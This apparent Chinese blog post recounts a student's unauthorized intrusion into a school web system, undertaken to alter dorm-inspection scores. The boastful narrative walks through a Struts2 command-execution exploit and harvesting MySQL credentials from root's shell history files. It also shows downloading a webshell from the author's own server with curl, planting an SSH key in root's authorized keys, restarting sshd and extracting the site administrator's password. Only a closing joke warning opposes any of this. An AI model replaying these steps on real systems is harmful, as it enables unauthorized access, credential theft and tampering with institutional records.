渗透学校某系统

起因:检查宿舍的人扣我们寝室的的分了,学长告诉我有漏洞的, 那就燃起斗志搞下他    233333

目标网址:xxxxx.action
漏洞:struct2任意命令执行
不要说存在任意命令执行就感觉可以完成一切了,之前我也是这样想的,实际情况告诉我,我想做的事情并做不了

利用过程:    
首先是我已经可以执行命令了,但是我想获取它mysql里边存放的网站管理员的账号密码,因为我要改我的分嘛,只是命令是没有用的

首先需要找到mysql的账号密码,然后登陆进去mysql

目标清楚了,然后开始操作,找mysql的账号密码

我的第一反应是直接在网站的配置文件中找mysql的账号密码,文件好多啊...
手工太麻烦了,就是着用grep -rn "root" 这样的方法去减少我查找的范围,虽然是少了一点,但是
还是感觉好麻烦...关键是找了好久都是乱七八糟的信息,有点躁...

大约半个月前就想着利用过,在 /root/下边发现好多 .bash_history .mysql_history 的记录文件,
就一个一个打开看的没有发现有管理员的账号密码,也没有我想要的信息
所以这次测试的时候基本没想过看这几个文件,想着和之前的文件应该是一样的,事实证明这个想法是错的
依旧是这个文件,我没有找到系统管理员的账号密码,然而,我发现了mysql管理员的账号和密码

连接数据库,我知道两种方法,
一种是大马上边自带的数据库连接,第二种就是ssh链接进去,命令行连接
第一种方法:我的大马需要有数据库名称,这就尴尬了,本来就不想去文件堆里边找数据库的信息了,直接放弃了...
第二种方法:因为不能使用echo 重定向等我知道的写入文件的命令,然后我的服务器就派上用场了,对,使用curl
这里边的curl是可以用的,但是后缀记得改掉,因为下载文件的时候.jsp/.php后缀文件,你只能下载下来html
curl xxxxxxxxx/dama.txt -o /xx/xx/dama.jsp 就ok了 ~~
大马上去了就可以方便读写文件了,我试着直接在.ssh目录下边新建文件失败,然后测试是否是大马的上传功能
不能使用,然后在/root/目录下进行新建文件,成功!接着想到了,能不能在/root/目录下创建好公匙文件,
然后移动到 .ssh 目录? 将目标服务器上边的ssh的公匙复制下,然后将自己的公匙添加到人家的公匙下边
我进行尝试 ,创建成功!移动成功!

接着新手需要注意了,重启sshd 服务才可以,大马进行命令执行 service sshd restart
提示 ,重启成功!
ssh [email protected]
连接成功!!!
之后尝试进行mysql的登录
mysql -uroot -p
登陆成功!!!
查询数据库的信息,成功找到网站管理员的账号密码!!!
到此,渗透加上获取自己需要的信息完毕

可以向同学装逼了 23333
警告!!!不要做坏事哦!!!

你可能感兴趣的:(渗透)